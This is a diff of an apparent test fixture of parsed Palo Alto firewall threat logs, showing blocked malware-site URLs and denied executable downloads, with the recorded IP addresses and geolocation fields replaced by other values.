+        "event.original": "Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,\"basdzsdas.com/poker/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -5357,9 +5099,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 22250,
+        "log.offset": 22169,
         "network.application": "web-browsing",
-        "network.community_id": "1:Inta5pHrKZ+nIMo9QJjgmv1raGE=",
+        "network.community_id": "1:QBN/QiBktrWtqynSIiAfIzaYi1Q=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -5394,13 +5136,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -5420,7 +5162,7 @@
     },
     {
         "@timestamp": "2012-04-10T04:51:29.000-02:00",
-        "client.ip": "91.209.163.202",
+        "client.ip": "81.2.69.193",
         "client.port": 80,
         "destination.address": "192.168.0.2",
         "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -5436,7 +5178,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,file,1,2012/04/10 04:51:29,91.209.163.202,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:51:34,37983,1,80,61220,0,0,0x200000,tcp,deny,\"FunkyEmoticons_setup.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0,",
+        "event.original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,file,1,2012/04/10 04:51:29,81.2.69.193,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:51:34,37983,1,80,61220,0,0,0x200000,tcp,deny,\"FunkyEmoticons_setup.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0,",
         "event.outcome": "success",
         "event.severity": 4,
         "event.timezone": "-02:00",
@@ -5449,9 +5191,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "low",
-        "log.offset": 22658,
+        "log.offset": 22575,
         "network.application": "web-browsing",
-        "network.community_id": "1:dHpseryW+AZk/t5IUvlyhaLSGI0=",
+        "network.community_id": "1:cbjnKGuPCSblIcmohKZKae9UtoE=",
         "network.direction": "outbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -5483,7 +5225,7 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "91.209.163.202"
+            "81.2.69.193"
         ],
         "related.user": [
             "crusher"
@@ -5493,19 +5235,17 @@
         "server.port": 61220,
         "server.user.name": "crusher",
         "service.type": "panw",
-        "source.address": "91.209.163.202",
-        "source.as.number": 9009,
-        "source.as.organization.name": "M247 Ltd",
-        "source.geo.city_name": "Montreal",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "CA",
-        "source.geo.country_name": "Canada",
-        "source.geo.location.lat": 45.4995,
-        "source.geo.location.lon": -73.5848,
+        "source.address": "81.2.69.193",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
         "source.geo.name": "European Union",
-        "source.geo.region_iso_code": "CA-QC",
-        "source.geo.region_name": "Quebec",
-        "source.ip": "91.209.163.202",
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.193",
         "source.port": 80,
         "tags": [
             "forwarded",
@@ -5514,7 +5254,7 @@
     },
     {
         "@timestamp": "2012-04-10T04:54:33.000-02:00",
-        "client.ip": "122.226.169.183",
+        "client.ip": "81.2.69.145",
         "client.port": 80,
         "destination.address": "192.168.0.2",
         "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -5530,7 +5270,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,file,1,2012/04/10 04:54:33,122.226.169.183,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:54:38,41989,1,80,61726,0,0,0x200000,tcp,deny,\"52hxw.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,China,192.168.0.0-192.168.255.255,0,",
+        "event.original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,file,1,2012/04/10 04:54:33,81.2.69.145,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:54:38,41989,1,80,61726,0,0,0x200000,tcp,deny,\"52hxw.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,China,192.168.0.0-192.168.255.255,0,",
         "event.outcome": "success",
         "event.severity": 4,
         "event.timezone": "-02:00",
@@ -5543,9 +5283,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "low",
-        "log.offset": 23063,
+        "log.offset": 22977,
         "network.application": "web-browsing",
-        "network.community_id": "1:lIp7rPLlF21gCwZ63WafZ2HbNKA=",
+        "network.community_id": "1:eTLAtG51ZPV2/dv+SiB436Dz5qc=",
         "network.direction": "outbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -5576,8 +5316,8 @@
         "panw.panos.virtual_sys": "vsys1",
         "related.ip": [
             "0.0.0.0",
-            "122.226.169.183",
-            "192.168.0.2"
+            "192.168.0.2",
+            "81.2.69.145"
         ],
         "related.user": [
             "crusher"
@@ -5587,18 +5327,17 @@
         "server.port": 61726,
         "server.user.name": "crusher",
         "service.type": "panw",
-        "source.address": "122.226.169.183",
-        "source.as.number": 4134,
-        "source.as.organization.name": "No.31,Jin-rong Street",
-        "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 30.294,
-        "source.geo.location.lon": 120.1619,
+        "source.address": "81.2.69.145",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
         "source.geo.name": "China",
-        "source.geo.region_iso_code": "CN-ZJ",
-        "source.geo.region_name": "Zhejiang",
-        "source.ip": "122.226.169.183",
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.145",
         "source.port": 80,
         "tags": [
             "forwarded",
@@ -5610,19 +5349,15 @@
         "client.ip": "192.168.0.2",
         "client.port": 63007,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.ip": "67.43.156.12",
         "destination.port": 80,
         "event.action": "url_filtering",
         "event.category": [
@@ -5633,7 +5368,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,url,1,2012/04/10 05:01:00,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 05:01:00,49238,1,63007,80,0,0,0x200000,tcp,block-url,\"softsellfast.com/test/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
+        "event.original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,url,1,2012/04/10 05:01:00,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 05:01:00,49238,1,63007,80,0,0,0x200000,tcp,block-url,\"softsellfast.com/test/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -5644,9 +5379,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 23445,
+        "log.offset": 23355,
         "network.application": "web-browsing",
-        "network.community_id": "1:n39Q6RPkLwPiDU/pfHT7uRZGkXY=",
+        "network.community_id": "1:Vnp8O+V9Crkk7bOq4MUbJbz2E70=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -5681,13 +5416,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -5707,7 +5442,7 @@
     },
     {
         "@timestamp": "2012-04-10T04:45:17.000-02:00",
-        "client.ip": "109.201.131.15",
+        "client.ip": "67.43.156.12",
         "client.port": 80,
         "destination.address": "192.168.0.2",
         "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -5723,7 +5458,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:45:17,109.201.131.15,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:45:23,21592,1,80,60212,0,0,0x200000,tcp,deny,\"setup.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Netherlands,192.168.0.0-192.168.255.255,0,",
+        "event.original": "Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:45:17,67.43.156.12,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:45:23,21592,1,80,60212,0,0,0x200000,tcp,deny,\"setup.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Netherlands,192.168.0.0-192.168.255.255,0,",
         "event.outcome": "success",
         "event.severity": 4,
         "event.timezone": "-02:00",
@@ -5736,9 +5471,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "low",
-        "log.offset": 23856,
+        "log.offset": 23764,
         "network.application": "web-browsing",
-        "network.community_id": "1:69YGwS9/vtp36Khj80nU/Q0TTfM=",
+        "network.community_id": "1:ax9QTTbZfu796fTkm9gci3IIYNU=",
         "network.direction": "outbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -5769,8 +5504,8 @@
         "panw.panos.virtual_sys": "vsys1",
         "related.ip": [
             "0.0.0.0",
-            "109.201.131.15",
-            "192.168.0.2"
+            "192.168.0.2",
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
@@ -5780,16 +5515,15 @@
         "server.port": 60212,
         "server.user.name": "crusher",
         "service.type": "panw",
-        "source.address": "109.201.131.15",
-        "source.as.number": 43350,
-        "source.as.organization.name": "NForce Entertainment B.V.",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "NL",
-        "source.geo.country_name": "Netherlands",
-        "source.geo.location.lat": 52.3824,
-        "source.geo.location.lon": 4.8995,
+        "source.address": "67.43.156.12",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
         "source.geo.name": "Netherlands",
-        "source.ip": "109.201.131.15",
+        "source.ip": "67.43.156.12",
         "source.port": 80,
         "tags": [
             "forwarded",
@@ -5798,7 +5532,7 @@
     },
     {
         "@timestamp": "2012-04-10T04:46:16.000-02:00",
-        "client.ip": "91.209.163.202",
+        "client.ip": "81.2.69.193",
         "client.port": 80,
         "destination.address": "192.168.0.2",
         "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -5814,7 +5548,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:46:16,91.209.163.202,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:46:22,33760,1,80,60392,0,0,0x200000,tcp,deny,\"Live-Player_setup.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0,",
+        "event.original": "Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:46:16,81.2.69.193,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:46:22,33760,1,80,60392,0,0,0x200000,tcp,deny,\"Live-Player_setup.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0,",
         "event.outcome": "success",
         "event.severity": 4,
         "event.timezone": "-02:00",
@@ -5827,9 +5561,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "low",
-        "log.offset": 24243,
+        "log.offset": 24149,
         "network.application": "web-browsing",
-        "network.community_id": "1:MKMWzixtfYaSoShU7T3wN6MLk5g=",
+        "network.community_id": "1:oLAStb88YJIIwaJLzaoMDQ4okzg=",
         "network.direction": "outbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -5861,7 +5595,7 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "91.209.163.202"
+            "81.2.69.193"
         ],
         "related.user": [
             "crusher"
@@ -5871,19 +5605,17 @@
         "server.port": 60392,
         "server.user.name": "crusher",
         "service.type": "panw",
-        "source.address": "91.209.163.202",
-        "source.as.number": 9009,
-        "source.as.organization.name": "M247 Ltd",
-        "source.geo.city_name": "Montreal",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "CA",
-        "source.geo.country_name": "Canada",
-        "source.geo.location.lat": 45.4995,
-        "source.geo.location.lon": -73.5848,
+        "source.address": "81.2.69.193",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
         "source.geo.name": "European Union",
-        "source.geo.region_iso_code": "CA-QC",
-        "source.geo.region_name": "Quebec",
-        "source.ip": "91.209.163.202",
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.193",
         "source.port": 80,
         "tags": [
             "forwarded",
@@ -5896,13 +5628,6 @@
         "client.port": 59709,
         "client.user.name": "crusher",
         "destination.address": "213.180.199.61",
-        "destination.as.number": 13238,
-        "destination.as.organization.name": "YANDEX LLC",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "RU",
-        "destination.geo.country_name": "Russia",
-        "destination.geo.location.lat": 55.7386,
-        "destination.geo.location.lon": 37.6068,
         "destination.geo.name": "Russian Federation",
         "destination.ip": "213.180.199.61",
         "destination.port": 80,
@@ -5926,7 +5651,7 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 24645,
+        "log.offset": 24548,
         "network.application": "web-browsing",
         "network.community_id": "1:J4hfLZVy8UJEkW68RkW2hMu84Wk=",
         "network.direction": "inbound",
@@ -5993,13 +5718,6 @@
         "client.port": 59721,
         "client.user.name": "crusher",
         "destination.address": "213.180.199.61",
-        "destination.as.number": 13238,
-        "destination.as.organization.name": "YANDEX LLC",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "RU",
-        "destination.geo.country_name": "Russia",
-        "destination.geo.location.lat": 55.7386,
-        "destination.geo.location.lon": 37.6068,
         "destination.geo.name": "Russian Federation",
         "destination.ip": "213.180.199.61",
         "destination.port": 80,
@@ -6023,7 +5741,7 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 25056,
+        "log.offset": 24959,
         "network.application": "web-browsing",
         "network.community_id": "1:1211QM61Juawz4PBXLQBL9Q2FNA=",
         "network.direction": "inbound",
@@ -6090,13 +5808,6 @@
         "client.port": 59752,
         "client.user.name": "crusher",
         "destination.address": "213.180.199.61",
-        "destination.as.number": 13238,
-        "destination.as.organization.name": "YANDEX LLC",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "RU",
-        "destination.geo.country_name": "Russia",
-        "destination.geo.location.lat": 55.7386,
-        "destination.geo.location.lon": 37.6068,
         "destination.geo.name": "Russian Federation",
         "destination.ip": "213.180.199.61",
         "destination.port": 80,
@@ -6120,7 +5831,7 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 25469,
+        "log.offset": 25372,
         "network.application": "web-browsing",
         "network.community_id": "1:MQfJlERz16LAn6Hn1YhCNKLOjjA=",
         "network.direction": "inbound",
@@ -6183,7 +5894,7 @@
     },
     {
         "@timestamp": "2012-04-10T04:19:59.000-02:00",
-        "client.ip": "173.236.179.57",
+        "client.ip": "89.160.20.112",
         "client.port": 80,
         "destination.address": "192.168.0.2",
         "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -6199,7 +5910,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Mar 25 23:59:17 1,2013/03/25 23:59:17,01606001116,THREAT,file,1,2012/04/10 04:19:59,173.236.179.57,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,\"uLLGRaXP.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+        "event.original": "Mar 25 23:59:17 1,2013/03/25 23:59:17,01606001116,THREAT,file,1,2012/04/10 04:19:59,89.160.20.112,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,\"uLLGRaXP.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
         "event.outcome": "success",
         "event.severity": 4,
         "event.timezone": "-02:00",
@@ -6212,9 +5923,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "low",
-        "log.offset": 25884,
+        "log.offset": 25787,
         "network.application": "web-browsing",
-        "network.community_id": "1:to6WA2KM9vqO74DfMPJ8+v0cKPs=",
+        "network.community_id": "1:53oYZBFsaxzIKiLZtutnXPu7S8M=",
         "network.direction": "outbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -6245,8 +5956,8 @@
         "panw.panos.virtual_sys": "vsys1",
         "related.ip": [
             "0.0.0.0",
-            "173.236.179.57",
-            "192.168.0.2"
+            "192.168.0.2",
+            "89.160.20.112"
         ],
         "related.user": [
             "crusher"
@@ -6256,19 +5967,19 @@
         "server.port": 54431,
         "server.user.name": "crusher",
         "service.type": "panw",
-        "source.address": "173.236.179.57",
-        "source.as.number": 26347,
-        "source.as.organization.name": "New Dream Network, LLC",
-        "source.geo.city_name": "Brea",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 33.9339,
-        "source.geo.location.lon": -117.8854,
+        "source.address": "89.160.20.112",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
         "source.geo.name": "United States",
-        "source.geo.region_iso_code": "US-CA",
-        "source.geo.region_name": "California",
-        "source.ip": "173.236.179.57",
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.112",
         "source.port": 80,
         "tags": [
             "forwarded",
@@ -6280,19 +5991,15 @@
         "client.ip": "192.168.0.2",
         "client.port": 63183,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.ip": "67.43.156.12",
         "destination.port": 80,
         "event.action": "url_filtering",
         "event.category": [
@@ -6303,7 +6010,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Mar 25 23:59:22 1,2013/03/25 23:59:22,01606001116,THREAT,url,1,2012/04/10 04:09:01,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:09:01,55402,1,63183,80,0,0,0x200000,tcp,block-url,\"marketingsoluchion.biz/fkn/config.bin\",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
+        "event.original": "Mar 25 23:59:22 1,2013/03/25 23:59:22,01606001116,THREAT,url,1,2012/04/10 04:09:01,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:09:01,55402,1,63183,80,0,0,0x200000,tcp,block-url,\"marketingsoluchion.biz/fkn/config.bin\",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -6314,9 +6021,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 26276,
+        "log.offset": 26178,
         "network.application": "web-browsing",
-        "network.community_id": "1:uO6RhHsqSUg1LHv5h+n+FE4cqrE=",
+        "network.community_id": "1://vTtuimNjuEw/yN5TfxgJqPEC4=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -6351,13 +6058,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -6381,17 +6088,7 @@
         "client.port": 1047,
         "client.user.name": "jordy",
         "destination.address": "207.46.140.46",
-        "destination.as.number": 8075,
-        "destination.as.organization.name": "Microsoft Corporation",
-        "destination.geo.city_name": "Central",
-        "destination.geo.continent_name": "Asia",
-        "destination.geo.country_iso_code": "HK",
-        "destination.geo.country_name": "Hong Kong",
-        "destination.geo.location.lat": 22.2909,
-        "destination.geo.location.lon": 114.15,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "HK-HCW",
-        "destination.geo.region_name": "Central and Western District",
         "destination.ip": "207.46.140.46",
         "destination.port": 80,
         "event.action": "data_match",
@@ -6416,7 +6113,7 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 26686,
+        "log.offset": 26586,
         "network.application": "web-browsing",
         "network.community_id": "1:KC3xpBK9CdouZqamG9S6Mjl6LIo=",
         "network.direction": "inbound",
@@ -6472,7 +6169,7 @@
     },
     {
         "@timestamp": "2012-04-09T08:18:29.000-02:00",
-        "client.ip": "65.54.161.34",
+        "client.ip": "81.2.69.143",
         "client.port": 80,
         "destination.address": "192.168.0.6",
         "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -6488,7 +6185,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:29,65.54.161.34,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:34,25653,1,80,1039,0,0,0x200000,tcp,alert,\"sck.aspx\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+        "event.original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:29,81.2.69.143,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:34,25653,1,80,1039,0,0,0x200000,tcp,alert,\"sck.aspx\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -6501,9 +6198,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 27064,
+        "log.offset": 26964,
         "network.application": "web-browsing",
-        "network.community_id": "1:qtNTXnMjHLAldLWQ5/jdyuCV6Yk=",
+        "network.community_id": "1:oZUSrEMVr54enE9TsNjtdpJu0L8=",
         "network.direction": "outbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -6535,7 +6232,7 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.6",
-            "65.54.161.34"
+            "81.2.69.143"
         ],
         "related.user": [
             "jordy"
@@ -6545,19 +6242,17 @@
         "server.port": 1039,
         "server.user.name": "jordy",
         "service.type": "panw",
-        "source.address": "65.54.161.34",
-        "source.as.number": 8075,
-        "source.as.organization.name": "Microsoft Corporation",
-        "source.geo.city_name": "Redmond",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 47.6722,
-        "source.geo.location.lon": -122.1257,
+        "source.address": "81.2.69.143",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
         "source.geo.name": "United States",
-        "source.geo.region_iso_code": "US-WA",
-        "source.geo.region_name": "Washington",
-        "source.ip": "65.54.161.34",
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "source.port": 80,
         "tags": [
             "forwarded",
@@ -6566,7 +6261,7 @@
     },
     {
         "@timestamp": "2012-04-09T08:18:32.000-02:00",
-        "client.ip": "65.55.5.231",
+        "client.ip": "81.2.69.143",
         "client.port": 80,
         "destination.address": "192.168.0.6",
         "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -6582,7 +6277,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
